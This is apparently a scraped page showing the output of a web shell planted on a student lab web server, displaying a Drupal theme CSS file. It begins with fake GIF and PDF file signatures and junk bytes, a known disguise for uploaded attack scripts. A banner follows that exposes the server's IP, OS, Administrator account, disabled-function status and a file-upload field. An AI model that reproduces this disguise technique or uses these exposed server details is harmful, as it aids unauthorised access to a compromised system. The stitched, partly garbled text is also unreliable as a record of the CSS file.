GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/themes/seven/css/theme/ |
Upload File : |
/** * @file * Installation styling. * * Unfortunately we have to make our styling quite strong, to override the * .maintenance-page styling. */ .install-page { background-color: #1275b2; background-image: url(../../images/noise-low.png), -webkit-radial-gradient(hsl(203, 80%, 45%), hsl(203, 80%, 32%)); background-image: url(../../images/noise-low.png), radial-gradient(hsl(203, 80%, 45%), hsl(203, 80%, 32%)); background-repeat: repeat; background-position: left top, 50% 50%; /* LTR */ min-height: 100%; } [dir="rtl"] .install-page { background-position: right top, 50% 50%; } /** * Password widget */ .install-page .password-parent, .install-page .confirm-parent { width: auto; } .install-page .form-item .password-suggestions { float: none; width: auto; } .install-page table td { word-break: break-all; } .install-page .site-version { vertical-align: super; font-size: 0.5em; color: #595959; } @media all and (max-width: 1010px) and (min-width: 48em) { .install-page .password-strength, .install-page .confirm-parent { width: 100%; } .install-configure-form .form-type-password { width: 100%; } .password-confirm, .password-field { float: none; } .password-confirm-match { float: none; width: auto; max-width: 100%; } }